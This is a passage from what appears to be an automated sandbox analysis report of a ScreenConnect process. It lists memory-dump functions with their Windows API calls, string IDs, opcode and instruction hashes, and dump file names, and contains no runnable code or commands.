                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2191148154-0
                                                                                                                                                                                                                                                        • Opcode ID: 9c22bb0d36e7b48ac8204bf5a833ec09459b41ce35360347f9c1aa26bbb8ab02
                                                                                                                                                                                                                                                        • Instruction ID: 9b323a23213dbee3048af452806d82f35c1e24c607166bbb281111b97d7e609d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9c22bb0d36e7b48ac8204bf5a833ec09459b41ce35360347f9c1aa26bbb8ab02
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0A2126B5D00258DFCB18CF9AD489B9EBBF5BF48300F148059E819A7350C774A845CF90
                                                                                                                                                                                                                                                        Function 05360D00 Relevance: 1.6, APIs: 1, Instructions: 65pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ConnectNamedPipe.KERNEL32(00000000), ref: 05360D78
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConnectNamedPipe
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2191148154-0
                                                                                                                                                                                                                                                        • Opcode ID: aad7d63b7b36323599d73c1e2aa76047cec5003e0bfc11321fc038a5325b93ee
                                                                                                                                                                                                                                                        • Instruction ID: 68a941e2c434d411465597ebdd652f17761929d068e843bb71b9a2cb4607b9e5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aad7d63b7b36323599d73c1e2aa76047cec5003e0bfc11321fc038a5325b93ee
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A92104B4D002589FCB18CFAAC589B9EBBF5AF48300F148059E819A7350CB74A845CFA0
                                                                                                                                                                                                                                                        Function 05352814 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 0535371D
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300491536.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnumProcesses
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 84517404-0
                                                                                                                                                                                                                                                        • Opcode ID: 551823c2a4860d64c78f6d98df26a46c13642d133177e0c7782e4031471ea351
                                                                                                                                                                                                                                                        • Instruction ID: 936f8c2c850066eaf72fb15a471d790d5ce4813111fe0e21100e38b90be35453
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 551823c2a4860d64c78f6d98df26a46c13642d133177e0c7782e4031471ea351
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D22116B59002499FDB10CF9AC885ADEBBF4FB48320F50842DD919A7300C7799945CBA5
                                                                                                                                                                                                                                                        Function 05364180 Relevance: 1.6, APIs: 1, Instructions: 59pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05364146), ref: 053641EF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: NamedPipeWait
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3146367894-0
                                                                                                                                                                                                                                                        • Opcode ID: 38946d7decdb59678d1b0eb596d5e80ddd9a7e480862256dfdae9e3e0943a11a
                                                                                                                                                                                                                                                        • Instruction ID: 55d47461fbdf551ea3cf624b6b491b74288be80263eddb317eb0069890152838
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 38946d7decdb59678d1b0eb596d5e80ddd9a7e480862256dfdae9e3e0943a11a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E52115B6C002098FCB10CF9AD484AEEBBF4FB48314F10842DD859A7240C779A545CFA1
                                                                                                                                                                                                                                                        Function 0536382C Relevance: 1.6, APIs: 1, Instructions: 59pipeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05364146), ref: 053641EF
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: NamedPipeWait
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3146367894-0
                                                                                                                                                                                                                                                        • Opcode ID: 66e89a0ae2468541483239a86ca50375fca9dfa97d5b3c73251a8c9c8be444e3
                                                                                                                                                                                                                                                        • Instruction ID: e2f94a7ae14bc8ae3e03938394a9eeb356493b2374c0efc72087eb0c4036aa90
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 66e89a0ae2468541483239a86ca50375fca9dfa97d5b3c73251a8c9c8be444e3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 442113B6C003498FCB20CF9AC484AAEBBF4FB88310F14842DD819A7241C779A945CFA1
                                                                                                                                                                                                                                                        Function 05352808 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 053537FE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300491536.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5350000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ProcessSession
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3779259828-0
                                                                                                                                                                                                                                                        • Opcode ID: 33c4422142d52db88ccb286ea4c02758b55fbe37bf993e0d579be3f9c3e8e39f
                                                                                                                                                                                                                                                        • Instruction ID: 9ff8a04851c96ba110a9c82660241d74cdf867f4bc3ccdea568508318e74e66e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 33c4422142d52db88ccb286ea4c02758b55fbe37bf993e0d579be3f9c3e8e39f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D1100B1C003498FCB20DF9AC444BEEBBF4FB48320F10846AD959A7240D779A945CFA5
                                                                                                                                                                                                                                                        Function 00DD8D98 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (aq
                                                                                                                                                                                                                                                        • API String ID: 0-600464949
                                                                                                                                                                                                                                                        • Opcode ID: 12c84cebd7d17183850fa4d0b3f4925a232b635b462bd179507af5ffac18664d
                                                                                                                                                                                                                                                        • Instruction ID: 571c99f708c5e388e615da629485469515a4c6c71c2ab1239eb8a2837d0b731e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12c84cebd7d17183850fa4d0b3f4925a232b635b462bd179507af5ffac18664d
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0611834B106099FCB15DF68E894A9EB7B6FF8D314B1480A9E506DB365DB30EC02DB50
                                                                                                                                                                                                                                                        Function 00DDAAA0 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: LR]q
                                                                                                                                                                                                                                                        • API String ID: 0-3081347316
                                                                                                                                                                                                                                                        • Opcode ID: b0bf4f3670790ff0574785f867764ee418fb6aa4a0de30abc0c2b9592f42873c
                                                                                                                                                                                                                                                        • Instruction ID: 86a9f71c595b112c4105b8d72e0f1fe5ba5a4a307dc442479a941cf2ebb37054
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0bf4f3670790ff0574785f867764ee418fb6aa4a0de30abc0c2b9592f42873c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A512630B002509FDB259B68D854B6EBBF2EF85700F18C56BE846DB391DB349C85C7A2
                                                                                                                                                                                                                                                        Function 00DD5DF0 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCuq
                                                                                                                                                                                                                                                        • API String ID: 0-4247494828
                                                                                                                                                                                                                                                        • Opcode ID: 515d0b43ab584654619a84e1daa525b95b8f9e6ec196d080bda53bb2a8ed833b
                                                                                                                                                                                                                                                        • Instruction ID: 8f0de74fc69f6321fa08f6b076c08ece64d60c85987b0d633572f05942136e8e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 515d0b43ab584654619a84e1daa525b95b8f9e6ec196d080bda53bb2a8ed833b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD519E307006058FCB54EB38E855A6E77E6EF88300B14847AE406DB369EF31DD06CBA1
                                                                                                                                                                                                                                                        Function 00DD5DEB Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: nCuq
                                                                                                                                                                                                                                                        • API String ID: 0-4247494828
                                                                                                                                                                                                                                                        • Opcode ID: cf4a1a1476aa5b4e179e814df0312f74099c88bae2af1bd0f5565ae74803f12c
                                                                                                                                                                                                                                                        • Instruction ID: 6d6a137c4da0d4efd1ab9ae1412f065661384e68c0d161b586a945b3d909c08a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf4a1a1476aa5b4e179e814df0312f74099c88bae2af1bd0f5565ae74803f12c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C3517F307106058FCB54EB38E955A6E77F6AF88300B148479E406DB3A9EF75ED06CBA1
                                                                                                                                                                                                                                                        Function 00DD7E50 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: (aq
                                                                                                                                                                                                                                                        • API String ID: 0-600464949
                                                                                                                                                                                                                                                        • Opcode ID: 2d20a97e5c44b65cec0f88412c29d9a1a2401e31768fc2656d62cb9b882e94a2
                                                                                                                                                                                                                                                        • Instruction ID: b0a20d93d40c8ffe141c3c5140c89a71fd1facc2268d3c02300175d87ad92d84
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d20a97e5c44b65cec0f88412c29d9a1a2401e31768fc2656d62cb9b882e94a2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66419231A00205CFCB15EF68E8946ADBB76EFC4311B18C56AD809DB355DB34ED06CBA1
                                                                                                                                                                                                                                                        Function 00DDE4F1 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: LR]q
                                                                                                                                                                                                                                                        • API String ID: 0-3081347316
                                                                                                                                                                                                                                                        • Opcode ID: 4d937a3d978897c65573d259363b414a115ffc0580b2150a03d3f4ab4295faef
                                                                                                                                                                                                                                                        • Instruction ID: d1bae2cc4e4e101b65122048a9ea75f0dc0bfe0e08788f635b0c41037035b408
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d937a3d978897c65573d259363b414a115ffc0580b2150a03d3f4ab4295faef
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CC21D331B003049FDB18AF65E855B6EBFB6ABC8740F08806DE402EB391EE709C41CB61
                                                                                                                                                                                                                                                        Function 05363EA1 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                        • Opcode ID: c46aa0e919155b9174645f338fd88c8bbdd726708d92c70219bc8730223eab66
                                                                                                                                                                                                                                                        • Instruction ID: 5c01c5915a7439fbfcf3aca89fe7b3ac9b8fd74714cb748774b1898ff87fa73e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c46aa0e919155b9174645f338fd88c8bbdd726708d92c70219bc8730223eab66
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 371113B58002498FCB10DF9AC545BEEBBF4EB48324F248459D518A7340D779A945CFA5
                                                                                                                                                                                                                                                        Function 05363EA8 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3300571010.0000000005360000.00000040.00000800.00020000.00000000.sdmp, Offset: 05360000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_5360000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                                                                        • Opcode ID: 1c427ae63e8ea42a8167faff313be4be97a893d31b344c188fb51f477b701d51
                                                                                                                                                                                                                                                        • Instruction ID: 9a76048ea744cd2798b2f4769d54192ba39131371c0d03cbae5fb065ec4347c1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c427ae63e8ea42a8167faff313be4be97a893d31b344c188fb51f477b701d51
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 761133B58003498FCB20DF9AC545BEEBBF4EF48324F208459D518A7340D779A945CFA5
                                                                                                                                                                                                                                                        Function 00DD5440 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $]q
                                                                                                                                                                                                                                                        • API String ID: 0-1007455737
                                                                                                                                                                                                                                                        • Opcode ID: 04352acd8a268030080495233beb288b83ef23c4646c65decf22996ed515b385
                                                                                                                                                                                                                                                        • Instruction ID: 2c14bda5b38f57132d679fb287a5b56bde58a96bfef96d702aa0dadd1fba9152
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04352acd8a268030080495233beb288b83ef23c4646c65decf22996ed515b385
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2E04F2214E7948FD313CB60E851A503F706E2361571E00D7C484CB277C519D889D733
                                                                                                                                                                                                                                                        Function 00DD5400 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $]q
                                                                                                                                                                                                                                                        • API String ID: 0-1007455737
                                                                                                                                                                                                                                                        • Opcode ID: 7fc9324d7aebbf006401122c95dd674dd62eebf8e0e4831e307abbb5e869c4b1
                                                                                                                                                                                                                                                        • Instruction ID: 1274b39f239b4ef504b034cb70e28776bf28260a5f5b7f7d5dab2e291b5b1830
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fc9324d7aebbf006401122c95dd674dd62eebf8e0e4831e307abbb5e869c4b1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7E08C302896048FE715CFA8EC81A0137F46F2971132904E7D844CB332CA21D842CB22
                                                                                                                                                                                                                                                        Function 00DDD078 Relevance: .2, Instructions: 242COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: de16f7caf61694e54a96cf1f818fc5d33a16f14f6156e6100a34743601878197
                                                                                                                                                                                                                                                        • Instruction ID: d0fb936619fb354b19fbbecec63331aa6e6e4fa6768469d95bba2ac1e694efbc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de16f7caf61694e54a96cf1f818fc5d33a16f14f6156e6100a34743601878197
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D5A10974B402088FCB14DBA8D594AADBBF6EF88300F1441A9E506EB3A5DB75ED45CF60
                                                                                                                                                                                                                                                        Function 00DDD077 Relevance: .2, Instructions: 230COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9852f5cfe5e422d47bb186b725569367ae6d65a9859ebe488b521a60009b93d3
                                                                                                                                                                                                                                                        • Instruction ID: a522cfb0bf25121dc117bf6df7dad85ba561f36d3031af0ab68448b0fe8b6c2a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9852f5cfe5e422d47bb186b725569367ae6d65a9859ebe488b521a60009b93d3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D911874A402088FCB14DBA8D994A9DBBF6EF88300F1445A9E506EB365DB71ED45CF60
                                                                                                                                                                                                                                                        Function 00DDE300 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: cb7483af813313980fa059aa402944fc15df71a5c36635f0899d4683ecd4a9b0
                                                                                                                                                                                                                                                        • Instruction ID: 8ede05f97edf37944321d35a19968a7a5007048ee019227ea5350df8a84616d3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb7483af813313980fa059aa402944fc15df71a5c36635f0899d4683ecd4a9b0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 24514E34B003058FCB14EF78D99496AB7E6EF983147148569E546CF365DB70EC068B91
                                                                                                                                                                                                                                                        Function 00DDE310 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 43dede53b78ae73a6c805c0aa2bd58226175073e981b4908b7c17af446e5e846
                                                                                                                                                                                                                                                        • Instruction ID: c99f542079fc889a71dcfe81b0b813a04569d283db52d74c6c99f48d089ec50b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 43dede53b78ae73a6c805c0aa2bd58226175073e981b4908b7c17af446e5e846
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14513D34B003058FCB14EF68D99496EB7EAEFD83147148569E54ACF365EB70EC068BA1
                                                                                                                                                                                                                                                        Function 00DD84A0 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 96f561c3fbf326327862574c0528ff427b5c0e22de0a50ef4d92f4c525c07f6c
                                                                                                                                                                                                                                                        • Instruction ID: 23a005ac3c1c31b44575527af8235556a124e12811f59412a65043c7a6edfeb0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96f561c3fbf326327862574c0528ff427b5c0e22de0a50ef4d92f4c525c07f6c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94510830600B018FC725CF29E884A66B7F6FF89324B244A5DD49ADB7A4DB31E806DB50
                                                                                                                                                                                                                                                        Function 00DDB2D0 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 06ed76cc0a2d4591d88d7e058e3674343ad89078743a3579be83c936f02ee540
                                                                                                                                                                                                                                                        • Instruction ID: 7ea80727e3a6fa996f47ceb8b9b11b4527ddb9488211e1314398dd9db1dcb528
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 06ed76cc0a2d4591d88d7e058e3674343ad89078743a3579be83c936f02ee540
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D518C34E503099FDB05DFB8D844B9DBBB5FF88300F108569E404AB3A5EB74A989CB61
                                                                                                                                                                                                                                                        Function 00DDEF67 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.3285025836.0000000000DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DD0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_dd0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
